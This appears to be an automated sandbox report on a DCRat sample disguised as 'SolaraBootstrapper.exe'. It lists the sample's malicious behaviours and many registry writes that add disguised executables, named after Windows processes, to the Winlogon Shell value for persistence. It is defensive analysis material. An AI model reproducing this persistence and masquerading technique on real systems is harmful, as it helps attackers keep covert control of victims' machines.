Analysis Overview
SHA256
2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab
Threat Level: Known bad
The file SolaraBootstrapper.exe was found to be: Known bad.
Malicious Activity Summary
DcRat
DCRat payload
Dcrat family
Process spawned unexpected child process
Modifies WinLogon for persistence
DCRat payload
Event Triggered Execution: AppInit DLLs
Command and Scripting Interpreter: PowerShell
.NET Reactor proctector
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
Enumerates connected drives
Blocklisted process makes network request
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Program crash
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Runs ping.exe
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Modifies system certificate store
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-21 20:15
Signatures
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Dcrat family
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-21 20:15
Reported
2024-07-21 21:59
Platform
win7-20240708-en
Max time kernel
1800s
Max time network
1804s
Command Line
Signatures
DcRat
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\", \"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\", \"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\", \"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\", \"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\winNet\\Idle.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\", \"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\", \"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
